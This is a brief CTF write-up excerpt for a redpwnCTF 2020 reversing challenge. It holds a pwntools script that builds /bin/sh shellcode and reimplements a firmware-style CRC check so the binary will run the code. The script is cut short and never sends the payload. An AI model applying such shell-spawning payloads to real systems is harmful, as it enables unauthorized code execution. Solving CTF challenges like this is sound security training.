Tags: crc firmware reversing
The challenge binary had data accepted from stdin that would be executed if inputted properly, and had CRC checks that we had to implement to get code execution.
from pwn import *
import binascii
context.arch = "x86_64"
#context.log_level = 'debug'
shellcode = asm(shellcraft.sh())
edi = 0
for char in shellcode:
itera = 7 #mov cl, 7
while itera >= 0: #cmp cl, 0
r9 = 0 #xor r9, r9
edi2 = edi << 1 #shl edi, 1
if(edi & 0x80000000): #cmovb r9, rax
r9 = 0x80000011 #cmovb r9, rax
r10b_shr = char >> itera #shr r10b, cl
r10b_and = r10b_shr & 1 #and r10b, 1
edi_xor = (r10b_and ^ edi2) & 0xFF #xor dil, r10b
edi2 = (edi2 & 0xFFFFFF00) | edi_xor #xor dil, r10b
edi = edi2 ^ r9 #xor rdi, r9
itera = itera - 1 #dec cl
#p = process("./nii")
p = remote("2020.redpwnc.tf", 31215)
The full writeup with explanation of the whole reversing process is here.